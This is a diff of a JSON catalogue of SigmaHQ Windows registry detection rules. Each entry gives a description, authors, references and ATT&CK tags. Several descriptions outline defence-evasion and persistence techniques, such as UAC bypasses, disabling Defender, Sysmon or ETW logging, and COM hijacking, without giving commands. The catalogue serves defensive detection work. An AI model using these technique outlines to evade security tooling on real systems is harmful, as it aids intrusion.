"Set TimeProviders DllName" + }, + { + "description": "Detects the creation of user-specific or system-wide environement variables via the registry. 
Which contains suspicious commands and strings",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/12/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_suspicious_env_variables.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://infosec.exchange/@sbousseaden/109542254124022664",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence"
+ ]
+ },
+ "uuid": "966315ef-c5e1-4767-ba25-fce9c8de3660",
+ "value": "Suspicious Environment Variable Has Been Registered"
+ },
+ {
+ "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/07/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_fax_change_service_user.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
+ "https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "e3fdf743-f05b-4051-990a-b66919be1743",
+ "value": "Change User Account Associated with the FAX Service"
+ },
+ {
+ "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disable_administrative_share.yml",
+ 
"level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "filename": "registry_set_mpnotify_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://persistence-info.github.io/Data/mpnotify.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify" + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender" + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer" + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "meta": { + "author": "EagleEye Team, Florian Roth, NVISO", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "registry_set_cve_2020_1048_new_printer_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_office_enable_dde.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ] + }, + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange" + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." 
+ ],
+ "filename": "registry_set_new_application_appcompat.yml",
+ "level": "informational",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/1",
+ "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204.002"
+ ]
+ },
+ "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d",
+ "value": "New Application in AppCompat"
+ },
+ {
+ "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry",
+ "meta": {
+ "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali",
+ "creation_date": "2022/08/01",
+ "falsepositive": [
+ "Administrator actions"
+ ],
+ "filename": "registry_set_disable_windows_defender_service.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a",
+ "value": "Windows Defender Service Disabled"
+ },
+ {
+ "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl",
+ "meta": {
+ "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)",
+ "creation_date": "2022/05/04",
+ "falsepositive": [
+ "Legitimate use of screen saver"
+ ],
+ "filename": "registry_set_scr_file_executed_by_rundll32.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ 
"logsource.product": "windows", + "refs": [ + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set" + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", "falsepositive": [ "Unlikely" ], - "filename": "win_defender_threat.yml", + "filename": "registry_set_persistence_autodial_dll.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL" + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": 
"registry_set_susp_user_shell_folders.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ] + }, + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value" + }, + { + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "meta": { + "author": "B.Talebi", + "creation_date": "2022/07/28", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator 
sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modifications to the hidden files keys in registry. 
This technique is abused by several malware families to hide their files from normal users.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_hide_file.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_hidden_extention.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan 
Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_mal_adwind.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry" + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task" + }, + { + "description": "Disable Microsoft Office Security 
Features by registry", + "meta": { + "author": "frack113", + "creation_date": "2021/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features" + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
+ ], + "filename": "registry_set_susp_service_installed.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed" + }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_macroruntimescanscope.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope" + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "meta": { + "author": "Austin 
Songer", + "creation_date": "2021/07/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_dns_over_https_enabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ] + }, + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS Enabled by Registry" + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chm_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence" + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_security_center_notifications.yml", + "level": "medium", + 
"logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper" + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_autologger_sessions.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": "AutoLogger Sessions Tamper" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dot_net_etw_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + 
"https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "ETW Logging Disabled In .NET Processes - Sysmon Registry" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_shim_databases_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ] + }, + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase" + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Probable legitimate applications. 
If you find these please add them to an exclusion list" + ], + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys 
